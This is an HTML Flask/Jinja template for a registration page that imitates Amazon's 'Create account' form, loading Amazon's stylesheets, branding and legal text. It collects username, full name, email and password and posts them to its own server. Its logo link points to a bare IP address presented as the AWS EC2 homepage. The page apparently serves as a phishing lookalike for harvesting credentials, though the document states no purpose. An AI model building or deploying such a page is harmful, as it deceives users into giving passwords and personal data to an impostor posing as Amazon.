<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title dir="ltr">Amazon Registration</title>
<link rel="stylesheet" href="https://images-na.ssl-images-amazon.com/images/I/61Brdu0o6LL._RC|11Fd9tJOdtL.css,21y5jWQoUML.css,31Q3id-QR0L.css,31P8A7PnBZL.css_.css#AUIClients/AmazonUI.min">
<link rel="stylesheet" href="https://images-na.ssl-images-amazon.com/images/I/01SdjaY0ZsL._RC|41i8aEvLYXL.css,21EmREG-NIL.css_.css#AUIClients/AuthenticationPortalAssets.debug.secure-true.min">
<link rel="stylesheet" href="https://images-na.ssl-images-amazon.com/images/G/01/AUIClients/CVFAssets-e91ba5c6e67c58c7f9c4c413fa67697feade389e._V2_.css#AUIClients/CVFAssets.debug.secure-true.min">
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>Amazon Web Services (AWS) -  EC2 Instances</title>
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
  <meta name="robots" content="index, nofollow" />
  <meta name="description" content="Amazon Web Services EC2 Instances" />

  <link rel="icon" type="image/ico"
href="https://a0.awsstatic.com/libra-css/images/site/fav/favicon.ico" />
  <link rel="shortcut icon" type="image/ico"
href="https://a0.awsstatic.com/libra-css/images/site/fav/favicon.ico" />
  <link rel="apple-touch-icon" sizes="57x57"
href="https://a0.awsstatic.com/libra-css/images/site/touch-icon-iphone-114-smile.png"
/>
  <link rel="apple-touch-icon" sizes="72x72"
href="https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.png"
/>
  <link rel="apple-touch-icon" sizes="114x114"
href="https://a0.awsstatic.com/libra-css/images/site/touch-icon-iphone-114-smile.png"
/>
  <link rel="apple-touch-icon" sizes="144x144"
href="https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.png"
/>
  <link rel="stylesheet" href="https://a0.awsstatic.com/main/css/1.0.391/style.css">
  <link rel="stylesheet"
href="https://a0.awsstatic.com/libra-css/css/1.0.190/style-awsm.css">
  <link rel="stylesheet" 
href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
  <link href="https://a0.awsstatic.com/libra-css/css/1.0.202/vendor/fontawesome.css" rel="stylesheet" type="text/css">
 <link rel="stylesheet" href="https://images-na.ssl-images-amazon.com/images/I/61Brdu0o6LL._RC|11Fd9tJOdtL.css,21y5jWQoUML.css,31Q3id-QR0L.css,31P8A7PnBZL.css_.css#AUIClients/AmazonUI.min">
    <link rel="stylesheet" href="https://images-na.ssl-images-amazon.com/images/I/01SdjaY0ZsL._RC|41i8aEvLYXL.css,21EmREG-NIL.css_.css#AUIClients/AuthenticationPortalAssets.debug.secure-true.min">
    <link rel="stylesheet" href="https://images-na.ssl-images-amazon.com/images/G/01/AUIClients/CVFAssets-e91ba5c6e67c58c7f9c4c413fa67697feade389e._V2_.css#AUIClients/CVFAssets.debug.secure-true.min">
  
</head>

<header id="aws-page-header" class="awsm" role="banner" style="margin-bottom:120px;">
   <div id="aws-nav" class="aws-nav" role="navigation">
    <div class="aws-nav-header">
     <!-- Left header with filter dropdown and aws logo TODO put back in
products to have dropdown
         for all ec2 instances --> 
      <div class="aws-bg-logo lb-bg-logo
aws-amazon_web_services_smile-header-desktop-en">
       <a href="http://35.176.100.32"><span>Click here to return to Amazon Web
Services EC2 Instances homepage</span></a>
      </div>
        <div style="margin: auto; width: 50%; padding: 15px;" class="a-section a-spacing-medium a-text-center">
    </div>
      
     </div>
     </div>
  </header>

<div id="authportal-center-section" class="a-section" style="margin-top:120px;">
    <div id="authportal-main-section" class="a-section">
        <div class="a-section a-spacing-base auth-pagelet-container">
            <div id="auth-cookie-warning-message" class="a-box a-alert a-alert-warning">
                <div class="a-box-inner a-alert-container"><h4 class="a-alert-heading">Please Enable Cookies to Continue</h4><i class="a-icon a-icon-alert"></i>
                    <div class="a-alert-content">
                        <p>
                          <a class="a-link-normal" href="/gp/help/customer/display.html/ref=ap_cookie_error_help?"></a>
                        </p>
                    </div>
                </div>
            </div>
        </div>

    <div class="a-section auth-pagelet-container">

    <!-- show a warning modal dialog when the third party account is connected with Amazon -->

    <div class="a-section">
    <form id="ap_register_form" name="register" method="post" novalidate=""  class="a-spacing-none auth-validate-form auth-real-time-validation fwcim-form" data-fwcim-id="db1756c0">
    <div class="a-box a-spacing-extra-large"><div class="a-box-inner">
      <h1 class="a-spacing-small">
        Create account
      </h1>
    {% for message in get_flashed_messages() %}
      <div class="flash">{{ message }}</div>
    {% endfor %}
      <!-- optional subheading element -->

    <div class="a-row a-spacing-base">
	   
	  <label for="username" class="a-form-label">
		Username
	  </label>
       
      <input type="text" maxlength="50" id="username" autocomplete="off" name="username" tabindex="1" class="a-input-text a-span12 auth-autofocus auth-required-field auth-contact-verification-request-info">

      <label for="firstname" class="a-form-label">
        First name
      </label>

      <input type="text" maxlength="50" id="firstname" autocomplete="off" name="firstname" tabindex="1" class="a-input-text a-span12 auth-autofocus auth-required-field auth-contact-verification-request-info">

      <label for="lastname" class="a-form-label">
        Last name
      </label>

      <input type="text" maxlength="50" id="lastname" autocomplete="off" name="lastname" tabindex="1" class="a-input-text a-span12 auth-autofocus auth-required-field auth-contact-verification-request-info">
        
    <div id="auth-customerName-missing-alert" class="a-box a-alert-inline a-alert-inline-error auth-inlined-error-message a-spacing-top-mini" aria-live="assertive" role="alert"><div class="a-box-inner a-alert-container"><i class="a-icon a-icon-alert"></i><div class="a-alert-content">
      Enter your name
    </div></div></div>

    </div>

     <div class="auth-require-fields-match-group">

    <div class="a-row a-spacing-base">
          
  <label for="email" class="a-form-label">
    Email
  </label>
          
  <input type="email" maxlength="64" id="email" name="email" tabindex="3" class="a-input-text a-span12 auth-required-field auth-require-fields-match auth-require-email-validaton auth-require-reverify-on-change auth-contact-verification-request-info">

    <div id="auth-email-missing-alert" class="a-box a-alert-inline a-alert-inline-error auth-inlined-error-message a-spacing-top-mini" aria-live="assertive" role="alert"><div class="a-box-inner a-alert-container"><i class="a-icon a-icon-alert"></i><div class="a-alert-content">
      Enter your email
    </div></div></div>

    <div id="auth-email-invalid-email-alert" class="a-box a-alert-inline a-alert-inline-error auth-inlined-error-message a-spacing-top-mini" aria-live="assertive" role="alert"><div class="a-box-inner a-alert-container"><i class="a-icon a-icon-alert"></i><div class="a-alert-content">
      Enter a valid email address
    </div></div></div>

    <div id="auth-email-invalid-claim-alert" class="a-box a-alert-inline a-alert-inline-error auth-inlined-error-message a-spacing-top-mini" aria-live="assertive" role="alert"><div class="a-box-inner a-alert-container"><i class="a-icon a-icon-alert"></i><div class="a-alert-content">
      Wrong or Invalid email address or mobile phone number. Please correct and try again.
    </div></div></div>

    <div id="auth-email-missing-alert-ango-email" class="a-box a-alert-inline a-alert-inline-error auth-inlined-error-message a-spacing-top-mini" aria-live="assertive" role="alert"><div class="a-box-inner a-alert-container"><i class="a-icon a-icon-alert"></i><div class="a-alert-content">
      Enter your email
    </div></div></div>

    <div id="auth-email-missing-alert-ango-phone" class="a-box a-alert-inline a-alert-inline-error auth-inlined-error-message a-spacing-top-mini" aria-live="assertive" role="alert"><div class="a-box-inner a-alert-container"><i class="a-icon a-icon-alert"></i><div class="a-alert-content">
      Enter your mobile phone number
    </div></div></div>
    </div>
</div>

    <div class="auth-require-fields-match-group">
    
    <div class="a-row a-spacing-base">
  
    <label for="password" class="a-form-label">
        Password
    </label>
    <input type="password" maxlength="1024" id="password" autocomplete="off" placeholder="At least 8 characters" name="password" tabindex="5" class="a-input-text a-form-normal a-span12 auth-required-field auth-require-fields-match  auth-require-password-validation">
  
    <div class="a-box a-alert-inline a-alert-inline-info auth-inlined-information-message a-spacing-top-mini"><div class="a-box-inner a-alert-container"><i class="a-icon a-icon-alert"></i><div class="a-alert-content">
      Passwords must be at least 8 characters.
    </div></div></div>

    <div id="auth-password-missing-alert" class="a-box a-alert-inline a-alert-inline-error auth-inlined-error-message a-spacing-top-mini" aria-live="assertive" role="alert"><div class="a-box-inner a-alert-container"><i class="a-icon a-icon-alert"></i><div class="a-alert-content">
      Enter your password
    </div></div></div>

    <div id="auth-password-invalid-password-alert" class="a-box a-alert-inline a-alert-inline-error auth-inlined-error-message a-spacing-top-mini" aria-live="assertive" role="alert"><div class="a-box-inner a-alert-container"><i class="a-icon a-icon-alert"></i><div class="a-alert-content">
      Passwords must be at least 8 characters.
    </div></div></div>
    </div>

    <div class="a-row a-spacing-base">
      <label for="password_check" class="a-form-label">
        Re-enter password
      </label>
      <input type="password" maxlength="1024" id="password_check" autocomplete="off" name="passwordCheck" tabindex="6" class="a-input-text a-form-normal a-span12 auth-required-field auth-require-fields-match">

    <div id="auth-passwordCheck-missing-alert" class="a-box a-alert-inline a-alert-inline-error auth-inlined-error-message a-spacing-top-mini" aria-live="assertive" role="alert"><div class="a-box-inner a-alert-container"><i class="a-icon a-icon-alert"></i><div class="a-alert-content">
      Type your password again
    </div></div></div>

    <div id="auth-password-mismatch-alert" class="a-box a-alert-inline a-alert-inline-error auth-inlined-error-message a-spacing-top-mini" aria-live="assertive" role="alert"><div class="a-box-inner a-alert-container"><i class="a-icon a-icon-alert"></i><div class="a-alert-content">
      Passwords must match
    </div></div></div>
</div>

</div>

  <div class="a-row a-spacing-extra-large">
        
    <span class="a-button a-button-normal a-button-span12 a-button-primary" id="a-autoid-0"><span class="a-button-inner"><input id="continue" tabindex="11" class="a-button-input" type="submit" aria-labelledby="a-autoid-0-announce"><span class="a-button-text" aria-hidden="true" id="a-autoid-0-announce">
      Create your account
    </span></span></span>

<div id="legalTextRow" class="a-row a-spacing-top-medium a-size-small">
  By creating an account, you agree to Amazon's <a href="https://www.amazon.com/gp/help/customer/display.html/ref=ap_register_notification_condition_of_use?ie=UTF8&nodeId=508088">Conditions of Use</a> and <a href="https://www.amazon.com/gp/help/customer/display.html/ref=ap_register_notification_privacy_notice?ie=UTF8&nodeId=468496">Privacy Notice</a>.
</div> 

</div>
      
    <div class="a-divider a-divider-section"><div class="a-divider-inner"></div></div>
        
        <div class="a-row">
          Already have an account?
          <a class="a-link-emphasis" href="{{ url_for('login') }}">
            Sign in
          </a>
        </div>
    </div></div>
  <script src="{{ url_for('static', filename='index.js') }}"></script>	
  </form>
</div>
</div>
</div>
</div>
</html>


